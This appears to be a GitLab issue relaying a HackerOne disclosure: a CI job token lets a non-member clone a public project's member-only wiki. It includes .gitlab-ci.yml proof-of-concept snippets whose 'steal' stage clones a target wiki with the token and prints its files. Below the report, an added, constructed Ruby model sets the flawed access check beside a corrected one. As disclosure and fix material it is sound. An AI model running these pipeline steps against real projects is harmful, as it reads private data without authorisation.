GitLab.org / GitLab / Issue #297282
Issue created Jan 11, 2021 by GitLab SecurityBot (@gitlab-securitybot)

Backend: Able to git the wiki despite the Only Project Members setting

HackerOne report #1075586 by shells3c on 2021-01-10, assigned to @rchan-gitlab:


Report

Summary

There was a mistake while confirming the patch for the Wiki bug in the past report #887755, and the fact is that the bug is still there! I am able to git the private wiki using the CI_JOB_TOKEN (public project).

Steps to reproduce
  1. Create a project and set the Wiki visibility to Only Project Members in the settings page: https://gitlab.com/<user>/<project>/edit
  2. Log in as another user (attacker) and create a .gitlab-ci.yml in an arbitrary project:

```yaml
stages:
  - steal

test:
  stage: steal
  script:
    - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/company/api.wiki.git'
    - 'cd api.wiki && cat api-doc.md'
```

  3. In the pipeline output, you will be able to read the content.
Examples
  • Can't access this: https://gitlab.com/just4hack2/mypro/-/wikis/home
  • Try adding the following to your .gitlab-ci.yml and read the wiki:

```yaml
stages:
  - steal

test:
  stage: steal
  script:
    - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/just4hack2/mypro.wiki.git'
    # the clone above creates a directory named after the repository, mypro.wiki
    - 'cd mypro.wiki'
    - 'ls'
    - 'cat home.md'
```

Impact

Able to read the private Wiki of GitLab projects.

How To Reproduce

Please add reproducibility information to this section:
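The report boils down to a git access check that looked only at project visibility and never at the separate Wiki feature setting. The constructed model below, added here and not GitLab's own code (all names are hypothetical), puts the flawed decision beside the corrected one so the gap is visible: on a public project with a member-only wiki, the flawed check lets a non-member's job token through, the corrected check does not.

```ruby
# Constructed model of the wiki git-access decision behind this report.
# Hypothetical names; this is not GitLab's implementation.

Project = Struct.new(:path, :visibility, :wiki_access, :members, keyword_init: true)
# visibility:  :private | :internal | :public    (project-level setting)
# wiki_access: :disabled | :private | :enabled   (Wiki feature setting;
#              :private is the "Only Project Members" option in the UI)
#
# A CI job token acts for the user whose pipeline issued it, so `user`
# is the pipeline author in the report's scenario (the "attacker").

# Simplified project-level visibility: public, or the user is a member.
def project_visible?(project, user)
  project.visibility == :public || project.members.include?(user)
end

# Flawed check: only asks whether the caller may see the project at all.
# On a public project that exposes <path>.wiki.git to any job token
# holder, which is exactly the behaviour the report describes.
def wiki_git_allowed_flawed?(project, user)
  project_visible?(project, user)
end

# Corrected check: the Wiki feature level is evaluated on its own, so a
# member-only wiki stays closed to non-members even on a public project.
def wiki_git_allowed?(project, user)
  return false unless project_visible?(project, user)

  case project.wiki_access
  when :enabled then true
  when :private then project.members.include?(user)
  else false # :disabled (or an unknown value): deny by default
  end
end

# Constructed sample matching the report: public project, member-only wiki.
SAMPLE_TARGET = Project.new(
  path: "company/api",
  visibility: :public,
  wiki_access: :private,
  members: ["owner"]
).freeze

if __FILE__ == $PROGRAM_NAME
  puts "flawed:    #{wiki_git_allowed_flawed?(SAMPLE_TARGET, 'attacker')}" # true
  puts "corrected: #{wiki_git_allowed?(SAMPLE_TARGET, 'attacker')}"        # false
  puts "member:    #{wiki_git_allowed?(SAMPLE_TARGET, 'owner')}"           # true
end
```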

Edited Apr 14, 2022 by Mark Nuzzo